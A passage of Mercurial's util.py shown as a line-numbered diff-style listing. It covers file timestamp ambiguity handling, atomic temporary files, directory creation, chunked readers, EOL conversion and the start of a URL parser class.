2432 same time in sec (= S[n-1].ctime), and comparison of timestamp
2434 same time in sec (= S[n-1].ctime), and comparison of timestamp
2433 is ambiguous.
2435 is ambiguous.
2434
2436
2435 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2437 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2436 timestamp is ambiguous".
2438 timestamp is ambiguous".
2437
2439
2438 But advancing mtime only in case (*2) doesn't work as
2440 But advancing mtime only in case (*2) doesn't work as
2439 expected, because naturally advanced S[n].mtime in case (*1)
2441 expected, because naturally advanced S[n].mtime in case (*1)
2440 might be equal to manually advanced S[n-1 or earlier].mtime.
2442 might be equal to manually advanced S[n-1 or earlier].mtime.
2441
2443
2442 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2444 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2443 treated as ambiguous regardless of mtime, to avoid overlooking
2445 treated as ambiguous regardless of mtime, to avoid overlooking
2444 by confliction between such mtime.
2446 by confliction between such mtime.
2445
2447
2446 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2448 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2447 S[n].mtime", even if size of a file isn't changed.
2449 S[n].mtime", even if size of a file isn't changed.
2448 """
2450 """
2449 try:
2451 try:
2450 return self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME]
2452 return self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME]
2451 except AttributeError:
2453 except AttributeError:
2452 return False
2454 return False
2453
2455
2454 def avoidambig(self, path, old):
2456 def avoidambig(self, path, old):
2455 """Change file stat of specified path to avoid ambiguity
2457 """Change file stat of specified path to avoid ambiguity
2456
2458
2457 'old' should be previous filestat of 'path'.
2459 'old' should be previous filestat of 'path'.
2458
2460
2459 This skips avoiding ambiguity, if a process doesn't have
2461 This skips avoiding ambiguity, if a process doesn't have
2460 appropriate privileges for 'path'. This returns False in this
2462 appropriate privileges for 'path'. This returns False in this
2461 case.
2463 case.
2462
2464
2463 Otherwise, this returns True, as "ambiguity is avoided".
2465 Otherwise, this returns True, as "ambiguity is avoided".
2464 """
2466 """
2465 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7FFFFFFF
2467 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7FFFFFFF
2466 try:
2468 try:
2467 os.utime(path, (advanced, advanced))
2469 os.utime(path, (advanced, advanced))
2468 except OSError as inst:
2470 except OSError as inst:
2469 if inst.errno == errno.EPERM:
2471 if inst.errno == errno.EPERM:
2470 # utime() on the file created by another user causes EPERM,
2472 # utime() on the file created by another user causes EPERM,
2471 # if a process doesn't have appropriate privileges
2473 # if a process doesn't have appropriate privileges
2472 return False
2474 return False
2473 raise
2475 raise
2474 return True
2476 return True
2475
2477
2476 def __ne__(self, other):
2478 def __ne__(self, other):
2477 return not self == other
2479 return not self == other
2478
2480
2479
2481
2480 class atomictempfile(object):
2482 class atomictempfile(object):
2481 """writable file object that atomically updates a file
2483 """writable file object that atomically updates a file
2482
2484
2483 All writes will go to a temporary copy of the original file. Call
2485 All writes will go to a temporary copy of the original file. Call
2484 close() when you are done writing, and atomictempfile will rename
2486 close() when you are done writing, and atomictempfile will rename
2485 the temporary copy to the original name, making the changes
2487 the temporary copy to the original name, making the changes
2486 visible. If the object is destroyed without being closed, all your
2488 visible. If the object is destroyed without being closed, all your
2487 writes are discarded.
2489 writes are discarded.
2488
2490
2489 checkambig argument of constructor is used with filestat, and is
2491 checkambig argument of constructor is used with filestat, and is
2490 useful only if target file is guarded by any lock (e.g. repo.lock
2492 useful only if target file is guarded by any lock (e.g. repo.lock
2491 or repo.wlock).
2493 or repo.wlock).
2492 """
2494 """
2493
2495
2494 def __init__(self, name, mode=b'w+b', createmode=None, checkambig=False):
2496 def __init__(self, name, mode=b'w+b', createmode=None, checkambig=False):
2495 self.__name = name # permanent name
2497 self.__name = name # permanent name
2496 self._tempname = mktempcopy(
2498 self._tempname = mktempcopy(
2497 name,
2499 name,
2498 emptyok=(b'w' in mode),
2500 emptyok=(b'w' in mode),
2499 createmode=createmode,
2501 createmode=createmode,
2500 enforcewritable=(b'w' in mode),
2502 enforcewritable=(b'w' in mode),
2501 )
2503 )
2502
2504
2503 self._fp = posixfile(self._tempname, mode)
2505 self._fp = posixfile(self._tempname, mode)
2504 self._checkambig = checkambig
2506 self._checkambig = checkambig
2505
2507
2506 # delegated methods
2508 # delegated methods
2507 self.read = self._fp.read
2509 self.read = self._fp.read
2508 self.write = self._fp.write
2510 self.write = self._fp.write
2509 self.seek = self._fp.seek
2511 self.seek = self._fp.seek
2510 self.tell = self._fp.tell
2512 self.tell = self._fp.tell
2511 self.fileno = self._fp.fileno
2513 self.fileno = self._fp.fileno
2512
2514
2513 def close(self):
2515 def close(self):
2514 if not self._fp.closed:
2516 if not self._fp.closed:
2515 self._fp.close()
2517 self._fp.close()
2516 filename = localpath(self.__name)
2518 filename = localpath(self.__name)
2517 oldstat = self._checkambig and filestat.frompath(filename)
2519 oldstat = self._checkambig and filestat.frompath(filename)
2518 if oldstat and oldstat.stat:
2520 if oldstat and oldstat.stat:
2519 rename(self._tempname, filename)
2521 rename(self._tempname, filename)
2520 newstat = filestat.frompath(filename)
2522 newstat = filestat.frompath(filename)
2521 if newstat.isambig(oldstat):
2523 if newstat.isambig(oldstat):
2522 # stat of changed file is ambiguous to original one
2524 # stat of changed file is ambiguous to original one
2523 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7FFFFFFF
2525 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7FFFFFFF
2524 os.utime(filename, (advanced, advanced))
2526 os.utime(filename, (advanced, advanced))
2525 else:
2527 else:
2526 rename(self._tempname, filename)
2528 rename(self._tempname, filename)
2527
2529
2528 def discard(self):
2530 def discard(self):
2529 if not self._fp.closed:
2531 if not self._fp.closed:
2530 try:
2532 try:
2531 os.unlink(self._tempname)
2533 os.unlink(self._tempname)
2532 except OSError:
2534 except OSError:
2533 pass
2535 pass
2534 self._fp.close()
2536 self._fp.close()
2535
2537
2536 def __del__(self):
2538 def __del__(self):
2537 if safehasattr(self, '_fp'): # constructor actually did something
2539 if safehasattr(self, '_fp'): # constructor actually did something
2538 self.discard()
2540 self.discard()
2539
2541
2540 def __enter__(self):
2542 def __enter__(self):
2541 return self
2543 return self
2542
2544
2543 def __exit__(self, exctype, excvalue, traceback):
2545 def __exit__(self, exctype, excvalue, traceback):
2544 if exctype is not None:
2546 if exctype is not None:
2545 self.discard()
2547 self.discard()
2546 else:
2548 else:
2547 self.close()
2549 self.close()
2548
2550
2549
2551
2550 def unlinkpath(f, ignoremissing=False, rmdir=True):
2552 def unlinkpath(f, ignoremissing=False, rmdir=True):
2551 # type: (bytes, bool, bool) -> None
2553 # type: (bytes, bool, bool) -> None
2552 """unlink and remove the directory if it is empty"""
2554 """unlink and remove the directory if it is empty"""
2553 if ignoremissing:
2555 if ignoremissing:
2554 tryunlink(f)
2556 tryunlink(f)
2555 else:
2557 else:
2556 unlink(f)
2558 unlink(f)
2557 if rmdir:
2559 if rmdir:
2558 # try removing directories that might now be empty
2560 # try removing directories that might now be empty
2559 try:
2561 try:
2560 removedirs(os.path.dirname(f))
2562 removedirs(os.path.dirname(f))
2561 except OSError:
2563 except OSError:
2562 pass
2564 pass
2563
2565
2564
2566
2565 def tryunlink(f):
2567 def tryunlink(f):
2566 # type: (bytes) -> None
2568 # type: (bytes) -> None
2567 """Attempt to remove a file, ignoring ENOENT errors."""
2569 """Attempt to remove a file, ignoring ENOENT errors."""
2568 try:
2570 try:
2569 unlink(f)
2571 unlink(f)
2570 except OSError as e:
2572 except OSError as e:
2571 if e.errno != errno.ENOENT:
2573 if e.errno != errno.ENOENT:
2572 raise
2574 raise
2573
2575
2574
2576
2575 def makedirs(name, mode=None, notindexed=False):
2577 def makedirs(name, mode=None, notindexed=False):
2576 # type: (bytes, Optional[int], bool) -> None
2578 # type: (bytes, Optional[int], bool) -> None
2577 """recursive directory creation with parent mode inheritance
2579 """recursive directory creation with parent mode inheritance
2578
2580
2579 Newly created directories are marked as "not to be indexed by
2581 Newly created directories are marked as "not to be indexed by
2580 the content indexing service", if ``notindexed`` is specified
2582 the content indexing service", if ``notindexed`` is specified
2581 for "write" mode access.
2583 for "write" mode access.
2582 """
2584 """
2583 try:
2585 try:
2584 makedir(name, notindexed)
2586 makedir(name, notindexed)
2585 except OSError as err:
2587 except OSError as err:
2586 if err.errno == errno.EEXIST:
2588 if err.errno == errno.EEXIST:
2587 return
2589 return
2588 if err.errno != errno.ENOENT or not name:
2590 if err.errno != errno.ENOENT or not name:
2589 raise
2591 raise
2590 parent = os.path.dirname(os.path.abspath(name))
2592 parent = os.path.dirname(os.path.abspath(name))
2591 if parent == name:
2593 if parent == name:
2592 raise
2594 raise
2593 makedirs(parent, mode, notindexed)
2595 makedirs(parent, mode, notindexed)
2594 try:
2596 try:
2595 makedir(name, notindexed)
2597 makedir(name, notindexed)
2596 except OSError as err:
2598 except OSError as err:
2597 # Catch EEXIST to handle races
2599 # Catch EEXIST to handle races
2598 if err.errno == errno.EEXIST:
2600 if err.errno == errno.EEXIST:
2599 return
2601 return
2600 raise
2602 raise
2601 if mode is not None:
2603 if mode is not None:
2602 os.chmod(name, mode)
2604 os.chmod(name, mode)
2603
2605
2604
2606
2605 def readfile(path):
2607 def readfile(path):
2606 # type: (bytes) -> bytes
2608 # type: (bytes) -> bytes
2607 with open(path, b'rb') as fp:
2609 with open(path, b'rb') as fp:
2608 return fp.read()
2610 return fp.read()
2609
2611
2610
2612
2611 def writefile(path, text):
2613 def writefile(path, text):
2612 # type: (bytes, bytes) -> None
2614 # type: (bytes, bytes) -> None
2613 with open(path, b'wb') as fp:
2615 with open(path, b'wb') as fp:
2614 fp.write(text)
2616 fp.write(text)
2615
2617
2616
2618
2617 def appendfile(path, text):
2619 def appendfile(path, text):
2618 # type: (bytes, bytes) -> None
2620 # type: (bytes, bytes) -> None
2619 with open(path, b'ab') as fp:
2621 with open(path, b'ab') as fp:
2620 fp.write(text)
2622 fp.write(text)
2621
2623
2622
2624
2623 class chunkbuffer(object):
2625 class chunkbuffer(object):
2624 """Allow arbitrary sized chunks of data to be efficiently read from an
2626 """Allow arbitrary sized chunks of data to be efficiently read from an
2625 iterator over chunks of arbitrary size."""
2627 iterator over chunks of arbitrary size."""
2626
2628
2627 def __init__(self, in_iter):
2629 def __init__(self, in_iter):
2628 """in_iter is the iterator that's iterating over the input chunks."""
2630 """in_iter is the iterator that's iterating over the input chunks."""
2629
2631
2630 def splitbig(chunks):
2632 def splitbig(chunks):
2631 for chunk in chunks:
2633 for chunk in chunks:
2632 if len(chunk) > 2 ** 20:
2634 if len(chunk) > 2 ** 20:
2633 pos = 0
2635 pos = 0
2634 while pos < len(chunk):
2636 while pos < len(chunk):
2635 end = pos + 2 ** 18
2637 end = pos + 2 ** 18
2636 yield chunk[pos:end]
2638 yield chunk[pos:end]
2637 pos = end
2639 pos = end
2638 else:
2640 else:
2639 yield chunk
2641 yield chunk
2640
2642
2641 self.iter = splitbig(in_iter)
2643 self.iter = splitbig(in_iter)
2642 self._queue = collections.deque()
2644 self._queue = collections.deque()
2643 self._chunkoffset = 0
2645 self._chunkoffset = 0
2644
2646
2645 def read(self, l=None):
2647 def read(self, l=None):
2646 """Read L bytes of data from the iterator of chunks of data.
2648 """Read L bytes of data from the iterator of chunks of data.
2647 Returns less than L bytes if the iterator runs dry.
2649 Returns less than L bytes if the iterator runs dry.
2648
2650
2649 If size parameter is omitted, read everything"""
2651 If size parameter is omitted, read everything"""
2650 if l is None:
2652 if l is None:
2651 return b''.join(self.iter)
2653 return b''.join(self.iter)
2652
2654
2653 left = l
2655 left = l
2654 buf = []
2656 buf = []
2655 queue = self._queue
2657 queue = self._queue
2656 while left > 0:
2658 while left > 0:
2657 # refill the queue
2659 # refill the queue
2658 if not queue:
2660 if not queue:
2659 target = 2 ** 18
2661 target = 2 ** 18
2660 for chunk in self.iter:
2662 for chunk in self.iter:
2661 queue.append(chunk)
2663 queue.append(chunk)
2662 target -= len(chunk)
2664 target -= len(chunk)
2663 if target <= 0:
2665 if target <= 0:
2664 break
2666 break
2665 if not queue:
2667 if not queue:
2666 break
2668 break
2667
2669
2668 # The easy way to do this would be to queue.popleft(), modify the
2670 # The easy way to do this would be to queue.popleft(), modify the
2669 # chunk (if necessary), then queue.appendleft(). However, for cases
2671 # chunk (if necessary), then queue.appendleft(). However, for cases
2670 # where we read partial chunk content, this incurs 2 dequeue
2672 # where we read partial chunk content, this incurs 2 dequeue
2671 # mutations and creates a new str for the remaining chunk in the
2673 # mutations and creates a new str for the remaining chunk in the
2672 # queue. Our code below avoids this overhead.
2674 # queue. Our code below avoids this overhead.
2673
2675
2674 chunk = queue[0]
2676 chunk = queue[0]
2675 chunkl = len(chunk)
2677 chunkl = len(chunk)
2676 offset = self._chunkoffset
2678 offset = self._chunkoffset
2677
2679
2678 # Use full chunk.
2680 # Use full chunk.
2679 if offset == 0 and left >= chunkl:
2681 if offset == 0 and left >= chunkl:
2680 left -= chunkl
2682 left -= chunkl
2681 queue.popleft()
2683 queue.popleft()
2682 buf.append(chunk)
2684 buf.append(chunk)
2683 # self._chunkoffset remains at 0.
2685 # self._chunkoffset remains at 0.
2684 continue
2686 continue
2685
2687
2686 chunkremaining = chunkl - offset
2688 chunkremaining = chunkl - offset
2687
2689
2688 # Use all of unconsumed part of chunk.
2690 # Use all of unconsumed part of chunk.
2689 if left >= chunkremaining:
2691 if left >= chunkremaining:
2690 left -= chunkremaining
2692 left -= chunkremaining
2691 queue.popleft()
2693 queue.popleft()
2692 # offset == 0 is enabled by block above, so this won't merely
2694 # offset == 0 is enabled by block above, so this won't merely
2693 # copy via ``chunk[0:]``.
2695 # copy via ``chunk[0:]``.
2694 buf.append(chunk[offset:])
2696 buf.append(chunk[offset:])
2695 self._chunkoffset = 0
2697 self._chunkoffset = 0
2696
2698
2697 # Partial chunk needed.
2699 # Partial chunk needed.
2698 else:
2700 else:
2699 buf.append(chunk[offset : offset + left])
2701 buf.append(chunk[offset : offset + left])
2700 self._chunkoffset += left
2702 self._chunkoffset += left
2701 left -= chunkremaining
2703 left -= chunkremaining
2702
2704
2703 return b''.join(buf)
2705 return b''.join(buf)
2704
2706
2705
2707
2706 def filechunkiter(f, size=131072, limit=None):
2708 def filechunkiter(f, size=131072, limit=None):
2707 """Create a generator that produces the data in the file size
2709 """Create a generator that produces the data in the file size
2708 (default 131072) bytes at a time, up to optional limit (default is
2710 (default 131072) bytes at a time, up to optional limit (default is
2709 to read all data). Chunks may be less than size bytes if the
2711 to read all data). Chunks may be less than size bytes if the
2710 chunk is the last chunk in the file, or the file is a socket or
2712 chunk is the last chunk in the file, or the file is a socket or
2711 some other type of file that sometimes reads less data than is
2713 some other type of file that sometimes reads less data than is
2712 requested."""
2714 requested."""
2713 assert size >= 0
2715 assert size >= 0
2714 assert limit is None or limit >= 0
2716 assert limit is None or limit >= 0
2715 while True:
2717 while True:
2716 if limit is None:
2718 if limit is None:
2717 nbytes = size
2719 nbytes = size
2718 else:
2720 else:
2719 nbytes = min(limit, size)
2721 nbytes = min(limit, size)
2720 s = nbytes and f.read(nbytes)
2722 s = nbytes and f.read(nbytes)
2721 if not s:
2723 if not s:
2722 break
2724 break
2723 if limit:
2725 if limit:
2724 limit -= len(s)
2726 limit -= len(s)
2725 yield s
2727 yield s
2726
2728
2727
2729
2728 class cappedreader(object):
2730 class cappedreader(object):
2729 """A file object proxy that allows reading up to N bytes.
2731 """A file object proxy that allows reading up to N bytes.
2730
2732
2731 Given a source file object, instances of this type allow reading up to
2733 Given a source file object, instances of this type allow reading up to
2732 N bytes from that source file object. Attempts to read past the allowed
2734 N bytes from that source file object. Attempts to read past the allowed
2733 limit are treated as EOF.
2735 limit are treated as EOF.
2734
2736
2735 It is assumed that I/O is not performed on the original file object
2737 It is assumed that I/O is not performed on the original file object
2736 in addition to I/O that is performed by this instance. If there is,
2738 in addition to I/O that is performed by this instance. If there is,
2737 state tracking will get out of sync and unexpected results will ensue.
2739 state tracking will get out of sync and unexpected results will ensue.
2738 """
2740 """
2739
2741
2740 def __init__(self, fh, limit):
2742 def __init__(self, fh, limit):
2741 """Allow reading up to <limit> bytes from <fh>."""
2743 """Allow reading up to <limit> bytes from <fh>."""
2742 self._fh = fh
2744 self._fh = fh
2743 self._left = limit
2745 self._left = limit
2744
2746
2745 def read(self, n=-1):
2747 def read(self, n=-1):
2746 if not self._left:
2748 if not self._left:
2747 return b''
2749 return b''
2748
2750
2749 if n < 0:
2751 if n < 0:
2750 n = self._left
2752 n = self._left
2751
2753
2752 data = self._fh.read(min(n, self._left))
2754 data = self._fh.read(min(n, self._left))
2753 self._left -= len(data)
2755 self._left -= len(data)
2754 assert self._left >= 0
2756 assert self._left >= 0
2755
2757
2756 return data
2758 return data
2757
2759
2758 def readinto(self, b):
2760 def readinto(self, b):
2759 res = self.read(len(b))
2761 res = self.read(len(b))
2760 if res is None:
2762 if res is None:
2761 return None
2763 return None
2762
2764
2763 b[0 : len(res)] = res
2765 b[0 : len(res)] = res
2764 return len(res)
2766 return len(res)
2765
2767
2766
2768
2767 def unitcountfn(*unittable):
2769 def unitcountfn(*unittable):
2768 '''return a function that renders a readable count of some quantity'''
2770 '''return a function that renders a readable count of some quantity'''
2769
2771
2770 def go(count):
2772 def go(count):
2771 for multiplier, divisor, format in unittable:
2773 for multiplier, divisor, format in unittable:
2772 if abs(count) >= divisor * multiplier:
2774 if abs(count) >= divisor * multiplier:
2773 return format % (count / float(divisor))
2775 return format % (count / float(divisor))
2774 return unittable[-1][2] % count
2776 return unittable[-1][2] % count
2775
2777
2776 return go
2778 return go
2777
2779
2778
2780
2779 def processlinerange(fromline, toline):
2781 def processlinerange(fromline, toline):
2780 # type: (int, int) -> Tuple[int, int]
2782 # type: (int, int) -> Tuple[int, int]
2781 """Check that linerange <fromline>:<toline> makes sense and return a
2783 """Check that linerange <fromline>:<toline> makes sense and return a
2782 0-based range.
2784 0-based range.
2783
2785
2784 >>> processlinerange(10, 20)
2786 >>> processlinerange(10, 20)
2785 (9, 20)
2787 (9, 20)
2786 >>> processlinerange(2, 1)
2788 >>> processlinerange(2, 1)
2787 Traceback (most recent call last):
2789 Traceback (most recent call last):
2788 ...
2790 ...
2789 ParseError: line range must be positive
2791 ParseError: line range must be positive
2790 >>> processlinerange(0, 5)
2792 >>> processlinerange(0, 5)
2791 Traceback (most recent call last):
2793 Traceback (most recent call last):
2792 ...
2794 ...
2793 ParseError: fromline must be strictly positive
2795 ParseError: fromline must be strictly positive
2794 """
2796 """
2795 if toline - fromline < 0:
2797 if toline - fromline < 0:
2796 raise error.ParseError(_(b"line range must be positive"))
2798 raise error.ParseError(_(b"line range must be positive"))
2797 if fromline < 1:
2799 if fromline < 1:
2798 raise error.ParseError(_(b"fromline must be strictly positive"))
2800 raise error.ParseError(_(b"fromline must be strictly positive"))
2799 return fromline - 1, toline
2801 return fromline - 1, toline
2800
2802
2801
2803
2802 bytecount = unitcountfn(
2804 bytecount = unitcountfn(
2803 (100, 1 << 30, _(b'%.0f GB')),
2805 (100, 1 << 30, _(b'%.0f GB')),
2804 (10, 1 << 30, _(b'%.1f GB')),
2806 (10, 1 << 30, _(b'%.1f GB')),
2805 (1, 1 << 30, _(b'%.2f GB')),
2807 (1, 1 << 30, _(b'%.2f GB')),
2806 (100, 1 << 20, _(b'%.0f MB')),
2808 (100, 1 << 20, _(b'%.0f MB')),
2807 (10, 1 << 20, _(b'%.1f MB')),
2809 (10, 1 << 20, _(b'%.1f MB')),
2808 (1, 1 << 20, _(b'%.2f MB')),
2810 (1, 1 << 20, _(b'%.2f MB')),
2809 (100, 1 << 10, _(b'%.0f KB')),
2811 (100, 1 << 10, _(b'%.0f KB')),
2810 (10, 1 << 10, _(b'%.1f KB')),
2812 (10, 1 << 10, _(b'%.1f KB')),
2811 (1, 1 << 10, _(b'%.2f KB')),
2813 (1, 1 << 10, _(b'%.2f KB')),
2812 (1, 1, _(b'%.0f bytes')),
2814 (1, 1, _(b'%.0f bytes')),
2813 )
2815 )
2814
2816
2815
2817
2816 class transformingwriter(object):
2818 class transformingwriter(object):
2817 """Writable file wrapper to transform data by function"""
2819 """Writable file wrapper to transform data by function"""
2818
2820
2819 def __init__(self, fp, encode):
2821 def __init__(self, fp, encode):
2820 self._fp = fp
2822 self._fp = fp
2821 self._encode = encode
2823 self._encode = encode
2822
2824
2823 def close(self):
2825 def close(self):
2824 self._fp.close()
2826 self._fp.close()
2825
2827
2826 def flush(self):
2828 def flush(self):
2827 self._fp.flush()
2829 self._fp.flush()
2828
2830
2829 def write(self, data):
2831 def write(self, data):
2830 return self._fp.write(self._encode(data))
2832 return self._fp.write(self._encode(data))
2831
2833
2832
2834
2833 # Matches a single EOL which can either be a CRLF where repeated CR
2835 # Matches a single EOL which can either be a CRLF where repeated CR
2834 # are removed or a LF. We do not care about old Macintosh files, so a
2836 # are removed or a LF. We do not care about old Macintosh files, so a
2835 # stray CR is an error.
2837 # stray CR is an error.
2836 _eolre = remod.compile(br'\r*\n')
2838 _eolre = remod.compile(br'\r*\n')
2837
2839
2838
2840
2839 def tolf(s):
2841 def tolf(s):
2840 # type: (bytes) -> bytes
2842 # type: (bytes) -> bytes
2841 return _eolre.sub(b'\n', s)
2843 return _eolre.sub(b'\n', s)
2842
2844
2843
2845
2844 def tocrlf(s):
2846 def tocrlf(s):
2845 # type: (bytes) -> bytes
2847 # type: (bytes) -> bytes
2846 return _eolre.sub(b'\r\n', s)
2848 return _eolre.sub(b'\r\n', s)
2847
2849
2848
2850
2849 def _crlfwriter(fp):
2851 def _crlfwriter(fp):
2850 return transformingwriter(fp, tocrlf)
2852 return transformingwriter(fp, tocrlf)
2851
2853
2852
2854
2853 if pycompat.oslinesep == b'\r\n':
2855 if pycompat.oslinesep == b'\r\n':
2854 tonativeeol = tocrlf
2856 tonativeeol = tocrlf
2855 fromnativeeol = tolf
2857 fromnativeeol = tolf
2856 nativeeolwriter = _crlfwriter
2858 nativeeolwriter = _crlfwriter
2857 else:
2859 else:
2858 tonativeeol = pycompat.identity
2860 tonativeeol = pycompat.identity
2859 fromnativeeol = pycompat.identity
2861 fromnativeeol = pycompat.identity
2860 nativeeolwriter = pycompat.identity
2862 nativeeolwriter = pycompat.identity
2861
2863
2862 if pyplatform.python_implementation() == b'CPython' and sys.version_info < (
2864 if pyplatform.python_implementation() == b'CPython' and sys.version_info < (
2863 3,
2865 3,
2864 0,
2866 0,
2865 ):
2867 ):
2866 # There is an issue in CPython that some IO methods do not handle EINTR
2868 # There is an issue in CPython that some IO methods do not handle EINTR
2867 # correctly. The following table shows what CPython version (and functions)
2869 # correctly. The following table shows what CPython version (and functions)
2868 # are affected (buggy: has the EINTR bug, okay: otherwise):
2870 # are affected (buggy: has the EINTR bug, okay: otherwise):
2869 #
2871 #
2870 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2872 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2871 # --------------------------------------------------
2873 # --------------------------------------------------
2872 # fp.__iter__ | buggy | buggy | okay
2874 # fp.__iter__ | buggy | buggy | okay
2873 # fp.read* | buggy | okay [1] | okay
2875 # fp.read* | buggy | okay [1] | okay
2874 #
2876 #
2875 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2877 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2876 #
2878 #
2877 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2879 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2878 # like "read*" work fine, as we do not support Python < 2.7.4.
2880 # like "read*" work fine, as we do not support Python < 2.7.4.
2879 #
2881 #
2880 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2882 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2881 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2883 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2882 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2884 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2883 # fp.__iter__ but not other fp.read* methods.
2885 # fp.__iter__ but not other fp.read* methods.
2884 #
2886 #
2885 # On modern systems like Linux, the "read" syscall cannot be interrupted
2887 # On modern systems like Linux, the "read" syscall cannot be interrupted
2886 # when reading "fast" files like on-disk files. So the EINTR issue only
2888 # when reading "fast" files like on-disk files. So the EINTR issue only
2887 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2889 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2888 # files approximately as "fast" files and use the fast (unsafe) code path,
2890 # files approximately as "fast" files and use the fast (unsafe) code path,
2889 # to minimize the performance impact.
2891 # to minimize the performance impact.
2890
2892
2891 def iterfile(fp):
2893 def iterfile(fp):
2892 fastpath = True
2894 fastpath = True
2893 if type(fp) is file:
2895 if type(fp) is file:
2894 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2896 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2895 if fastpath:
2897 if fastpath:
2896 return fp
2898 return fp
2897 else:
2899 else:
2898 # fp.readline deals with EINTR correctly, use it as a workaround.
2900 # fp.readline deals with EINTR correctly, use it as a workaround.
2899 return iter(fp.readline, b'')
2901 return iter(fp.readline, b'')
2900
2902
2901
2903
2902 else:
2904 else:
2903 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2905 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2904 def iterfile(fp):
2906 def iterfile(fp):
2905 return fp
2907 return fp
2906
2908
2907
2909
2908 def iterlines(iterator):
2910 def iterlines(iterator):
2909 # type: (Iterator[bytes]) -> Iterator[bytes]
2911 # type: (Iterator[bytes]) -> Iterator[bytes]
2910 for chunk in iterator:
2912 for chunk in iterator:
2911 for line in chunk.splitlines():
2913 for line in chunk.splitlines():
2912 yield line
2914 yield line
2913
2915
2914
2916
2915 def expandpath(path):
2917 def expandpath(path):
2916 # type: (bytes) -> bytes
2918 # type: (bytes) -> bytes
2917 return os.path.expanduser(os.path.expandvars(path))
2919 return os.path.expanduser(os.path.expandvars(path))
2918
2920
2919
2921
2920 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2922 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2921 """Return the result of interpolating items in the mapping into string s.
2923 """Return the result of interpolating items in the mapping into string s.
2922
2924
2923 prefix is a single character string, or a two character string with
2925 prefix is a single character string, or a two character string with
2924 a backslash as the first character if the prefix needs to be escaped in
2926 a backslash as the first character if the prefix needs to be escaped in
2925 a regular expression.
2927 a regular expression.
2926
2928
2927 fn is an optional function that will be applied to the replacement text
2929 fn is an optional function that will be applied to the replacement text
2928 just before replacement.
2930 just before replacement.
2929
2931
2930 escape_prefix is an optional flag that allows using doubled prefix for
2932 escape_prefix is an optional flag that allows using doubled prefix for
2931 its escaping.
2933 its escaping.
2932 """
2934 """
2933 fn = fn or (lambda s: s)
2935 fn = fn or (lambda s: s)
2934 patterns = b'|'.join(mapping.keys())
2936 patterns = b'|'.join(mapping.keys())
2935 if escape_prefix:
2937 if escape_prefix:
2936 patterns += b'|' + prefix
2938 patterns += b'|' + prefix
2937 if len(prefix) > 1:
2939 if len(prefix) > 1:
2938 prefix_char = prefix[1:]
2940 prefix_char = prefix[1:]
2939 else:
2941 else:
2940 prefix_char = prefix
2942 prefix_char = prefix
2941 mapping[prefix_char] = prefix_char
2943 mapping[prefix_char] = prefix_char
2942 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2944 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2943 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2945 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2944
2946
2945
2947
2946 def getport(port):
2948 def getport(port):
2947 # type: (Union[bytes, int]) -> int
2949 # type: (Union[bytes, int]) -> int
2948 """Return the port for a given network service.
2950 """Return the port for a given network service.
2949
2951
2950 If port is an integer, it's returned as is. If it's a string, it's
2952 If port is an integer, it's returned as is. If it's a string, it's
2951 looked up using socket.getservbyname(). If there's no matching
2953 looked up using socket.getservbyname(). If there's no matching
2952 service, error.Abort is raised.
2954 service, error.Abort is raised.
2953 """
2955 """
2954 try:
2956 try:
2955 return int(port)
2957 return int(port)
2956 except ValueError:
2958 except ValueError:
2957 pass
2959 pass
2958
2960
2959 try:
2961 try:
2960 return socket.getservbyname(pycompat.sysstr(port))
2962 return socket.getservbyname(pycompat.sysstr(port))
2961 except socket.error:
2963 except socket.error:
2962 raise error.Abort(
2964 raise error.Abort(
2963 _(b"no port number associated with service '%s'") % port
2965 _(b"no port number associated with service '%s'") % port
2964 )
2966 )
2965
2967
2966
2968
2967 class url(object):
2969 class url(object):
2968 r"""Reliable URL parser.
2970 r"""Reliable URL parser.
2969
2971
2970 This parses URLs and provides attributes for the following
2972 This parses URLs and provides attributes for the following
2971 components:
2973 components:
2972
2974
2973 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2975 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2974
2976
2975 Missing components are set to None. The only exception is
2977 Missing components are set to None. The only exception is
2976 fragment, which is set to '' if present but empty.
2978 fragment, which is set to '' if present but empty.
2977
2979
2978 If parsefragment is False, fragment is included in query. If
2980 If parsefragment is False, fragment is included in query. If
2979 parsequery is False, query is included in path. If both are
2981 parsequery is False, query is included in path. If both are
2980 False, both fragment and query are included in path.
2982 False, both fragment and query are included in path.
2981
2983
2982 See http://www.ietf.org/rfc/rfc2396.txt for more information.
